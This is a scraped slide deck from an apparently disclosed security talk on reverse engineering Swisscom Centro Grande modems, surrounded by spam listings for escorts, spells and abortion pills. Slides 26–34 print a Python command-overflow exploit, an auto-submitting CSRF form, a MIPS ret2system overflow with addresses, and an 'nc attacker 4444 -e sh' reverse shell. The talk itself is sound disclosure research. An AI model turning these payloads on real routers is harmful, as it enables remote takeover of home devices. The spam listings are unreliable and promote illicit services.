Rump attaque usb_caralinda_fabriceRump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabrice
 
Operation emmental appsec
Operation emmental appsecOperation emmental appsec
Operation emmental appsec
 
Colt sp sec2014_appsec-nf-vfinal
Colt sp sec2014_appsec-nf-vfinalColt sp sec2014_appsec-nf-vfinal
Colt sp sec2014_appsec-nf-vfinal
 

Recently uploaded

TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
mohitmore19
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
masabamasaba
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Nitya salvi
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 

Recently uploaded (20)

%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareAnnouncing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
 
Generic or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisionsGeneric or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisions
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 

Reverse engineering Swisscom's Centro Grande Modem

  • 1. Reverse engineering Swisscom’sReverse engineering Swisscom’s Centro Grande modemsCentro Grande modems Alain Mowat & Thomas ImbertAlain Mowat & Thomas Imbert
  • 2. 2whoami › Alain Mowat (@plopz0r) › Head of Audit division at SCRT › Pentest › Code review › Trainings › Mostly a Web App guy › Member of 0daysober CTF team › Watch other people exploiting cool vulns
  • 3. 3Background › Why look into the Swisscom modems? › Why this talk? › I don’t actually own a Swisscom modem › Made it a bit harder to study...
  • 4. 4Attack Surface › ADB# show netstat tcp 0 0 192.168.1.1:50602 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:9034 0.0.0.0:* LISTEN tcp 11 0 192.168.1.1:8080 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN tcp 0 0 192.168.1.1:22 0.0.0.0:* LISTEN tcp 0 0 192.168.1.1:23 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:7547 0.0.0.0:* LISTEN udp 0 0 0.0.0.0:9090 0.0.0.0:* udp 0 0 127.0.0.1:15000 0.0.0.0:* udp 0 0 0.0.0.0:53 0.0.0.0:* udp 0 0 0.0.0.0:323 0.0.0.0:* udp 0 0 0.0.0.0:67 0.0.0.0:* udp 0 0 0.0.0.0:68 0.0.0.0:* udp 0 0 178.199.180.148:5060 0.0.0.0:* udp 0 0 192.168.1.1:5351 0.0.0.0:* udp 0 0 0.0.0.0:1900 0.0.0.0:* udp 0 0 192.168.1.1:47863 0.0.0.0:* udp 0 0 0.0.0.0:123 0.0.0.0:* udp 0 0 ff02::1:2:547 :::* udp 0 0 :::53 :::* udp 0 0 :::323 :::* udp 0 0 :::123 :::* raw 0 0 0.0.0.0:2 0.0.0.0:* 2 raw 0 0 0.0.0.0:6 0.0.0.0:* 6 raw 0 0 :::58 :::*
  • 5. 5Attack Surface › ADB# show processes 256 0 2040 S logd 259 0 1308 S klogd -c3 271 0 832 S ec 343 0 3236 S cm 350 0 0 SW [dsl0] 363 0 0 SW [bcmsw] 364 0 0 SW [bcmsw_timer] 365 0 0 SW< [linkwatch] 5889 0 1132 S dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168 6227 0 1312 S telnetd Local -u 20 -b 192.168.1.1:23 -I 300 6898 65534 2292 S nhttpd -c /tmp/nhttpd.conf 7362 0 1000 S dhcps /tmp/dhcps.conf 7910 0 764 S dns 8014 0 1088 S miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4 8026 0 736 S /bin/wpspbc 8223 0 2676 S /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf 9164 0 1664 S /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot 9177 0 2940 S cwmp 9204 0 1316 S /bin/sh /etc/ah/printk_dump.sh 9353 0 884 S ec 9553 0 1312 S /bin/sh /etc/ah/procSentinel.sh cm 300 11846 0 1332 S /bin/sh DHCPv4Client.sh 11848 0 1320 S udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C 14753 0 792 S igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p 15287 0 3576 S voip 15688 0 740 S tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro 15923 0 1056 S N chronyd -f /tmp/chrony.conf 16770 0 820 S radvd 16812 0 2036 S dibbler-server start
  • 6. 6Finding the firmware › Locate the firmware › https://www.swisscom.ch/en/residential/help/device/internet-router/centro- grande.html › Vx226x1_61400.sig › Version at the time › 6.14.00
  • 7. 7Extracting the firmware › Binwalk (https://github.com/devttys0/binwalk) › Firmware modification kit › ./extract-firmware.sh
  • 8. 8CPE WAN Management Protocol › Also known as TR-069 › Protocol that defines how to manage « Customer-premises Equipment » › cwmp binary › Listens to 0.0.0.0:7547 › iptables rule allows access only from certain Swisscom subnets
  • 9. 9Web interface › Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html) › If a binary file is accessed through the web interface, it executes it › Directory traversal → Code Exec in version 1.9.3
  • 10. 10Web interface › Mostly managed by a CGI called ui
  • 11. 11Emulating the device › OpenWRT (https://openwrt.org/) › Linux distribution for embedded devices › Qemu (http://wiki.qemu.org/Main_Page) › Machine emulator and virtualizer
  • 12. 12Configuring OpenWRT › make menuconfig › MIPS target › Add all debugging and networking tools › Cross-compile nhttpd › Generate ramdisk › Copy Swisscom firmware files to the image › Run image with qemu › qemu-system-mips -kernel openwrt-malta-be-vmlinux-ini- tramfs.elf -net tap -net nic -nographic -m 2048
  • 13. 13Setting up the image › nhttpd server serverroot /www serveradmin webmaster@adbglobal.com servermimes conf/mimes docroot /www/htdocs docindex lanhosts logpid /tmp/logs user nobody disablehttp 0 notfound 501 sslport 443 sslcert /etc/certs/server.crt sslcertkey /etc/certs/server.key sslcertca /etc/certs/ca.pem sslcertreq * serverlisten 0.0.0.0 servername localhost
  • 16. 16Web request overview nhttpd swc_login.yapl swc_common.yapl swc_firewall.yapl ... ui cm POST /ui/swc/login Environment setup Configuration command Get corresponding YAPL « script »
  • 17. 17Configuration manager › Used to view and modify the device’s configuration › Bound to localhost:9034 › Also /tmp/cmctl socket › Several possible commands › GETO, GETV, … › SET, SETM, … › RESET, REBOOT, ... › DUMP, EXPORT, ...
  • 19. 19Configuration manager › Main loop listen on localhost port 9034 socket = accept while 1: input = socket.recv(16384) handleRequest(input) def handleRequest(input): type = validateRequestType(input) params = validateRequestParams(input) callTypeHandler(params)
  • 21. 21Finalizing the image setup udhcpc -i br-lan cm touch /tmp/cmctl chmod 777 /tmp/cmctl nhttpd -c /www/nhttpd.cfg nc localhost 9034 DOM Device /etc/cm/tr181/dom/ DOM InternetGatewayDevice /etc/cm/tr098/dom/ CONF /etc/cm/conf/ ADD InternetGatewayDevice.WANDevice ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1 SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1 SET Device.IP.Interface.1.Status Up SET Device.Ethernet.Link.1.Name br-lan SET Device.DeviceInfo.SerialNumber 123456 SET Device.IP.Interface.1.X_ADB_Upstream true SET Device.IP.Interface.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
  • 23. 23Configuration manager › Special syntax › Similar to SQL in certain ways › SELECT =~ GETV › UPDATE =~ SET › Conditions › GETO A.B.C.[Test=1] › GETO A.B.C.[Test~1] › GETO A.B.C.[Test!1]
  • 24. 24Vulnerability #1 : Command overflow › Each call to recv is treated as a new command › By sending more than 16384 characters, we can craft a new configuration command › Logging in to the web interface generates a call to the configuration manager that looks like this › GETO Users.User.[Username=ATTACKER_CONTROLLED] › By providing a long username, we can exceed the 16348 limit and gene- rate a new request within the configuration manager › Allows complete control over the device › Change passwords › Allow remote access › ...
  • 25. 25Vulnerability #1 : Command overflow ui cm GETO Users.User.[Username=A AAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA […] AAAAAAAAAAAAAAAAAAAAAAAAAAA REBOOTn recv(16384) recv(16384) send process(‘GETO Users……’) process(‘REBOOT’)
  • 26. 26Exploit #1 : Command overflow from requests import post payload = dict() payload['userName'] = ( 16358 ) * 'a' + 'REBOOT' + 'n' payload['userPwd'] = 'a' payload['login'] = 'Login' payload['language'] = '' while 1: r = post('http://192.168.1.1/ui/swc/login/index', data=payload) D EM O
  • 27. 27Vulnerability #2 : Login CSRF › Use CSRF to exploit someone else’s device <html> <body> <form method="POST" action="http://192.168.1.1/ui/swc/login/index"> <input type="hidden" name="userName" value="aaaaaaaaaa[...]aaaREBOOT%0a"/> <input type="hidden" name="userPwd" value="a"/> <input type="hidden" name="login" value="login"/> <input type="hidden" name="language" value=""/> </form> <script> document.forms[0].submit(); </script> </body> </html>
  • 28. 28Exposed web interfaces – Centro Business
  • 29. 29Vulnerability #3 : Buffer overflow(s) › Buffer overflow when parsing the name of XML files when performing certain commands (CONF, DOM, …) › Requirements › Arbitrarily-named XML file on the device › file and folder are both limited to 4096 in size parseFilesinFolder(folder): char path[4096]; files = scandir(folder) for file in files: if file ends with ".xml": strncat(path,folder,4096) strncat(path,file,4096) parseFile(filename)
  • 30. 30Exploit #3 : Creating the XML file › The PATHSAVE command takes 2 arguments › An XML filename › Property that needs to be saved › PATHSAVE /tmp/test.xml Users.User.1.Password › Can use this to write an arbitrarily-named file on the device › Exploit can then be triggered by prepending folder with lots of / › CONF /////////////////////////////////////[…]/tmp/exploit.xml
  • 31. 31Exploit #3 : Exploiting a MIPS binary Prologue Epilogue
  • 32. 32Exploit #3 : Exploiting a MIPS binary › No ASLR on the device › No NX › No canaries › A version of nc with the -e switch is present on the device › Try to call system(‘nc attacker 4444 -e sh’) › Arguments are not passed on the stack though, but in registers › $a0 › $a1 › …
  • 33. 33Exploit #3 : ret2system › Quick analysis gives address of system in libUclibc (Centro business) : › Libuclibc base : 0x2aaf8000 › System is at offset : 0x54610 › Real address : 0x2ab4c610 › Need a gadget in order to get our argument to system in $a0 › Make $a0 point to address in the stack › $s0 is also under our control
  • 34. 34Exploit #3 : ret2system /tmp/aaaaaaaaaaaaaaaax2axb4xc6x10bbbbbbbbbbbbbbb bbbbbbbbbbbbbbbbbx2axb1xcaxacaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaareboot; #bbbb.xml $ra → gadget $s0 → system command 64 * ‘a’ (addiu $a0,$sp,64)
  • 35. 35Exploit #3 : Full exploit D EM O
  • 36. 36Disclosure timeline › 9 September 2015 : Initial disclosure to Swisscom › 10 September 2015 : Vulnerabilities acknowledged by Swisscom › 11 September 2015 : Vendor notified (ADB) › 18 September 2015 : Confirmation of vulns & quick fix available › 24 September 2015 : Test of quick fix › 29 September 2015 : Contact with ADB › October 2015 : Rollout of quick fix to all devices › January 2016 : Status full fix : › Centro grande : 100 % › Centro Business 1.0 : 50 % › Centro Business 2.0 : 100 % › 13 June 2016 : Disclure
  • 37. 37Swisscom bounty › Combination of flaws rewarded with 3’000 CHF › Donated to the Ligue Vaudoise contre le Cancer › Swisscom Bug Bounty program is up & running › Talk is tomorrow afternoon :)
  • 38. 38Conclusions › Attackers › Look into other processes on the modem › miniupnp › voip › Embedded devices are found everywhere nowadays › Huge attack surface › Less people reversing firmwares than searching for XSS › Defenders › Consider 0days in your penetration tests › Test your defense in depth › Test your ability to detect breaches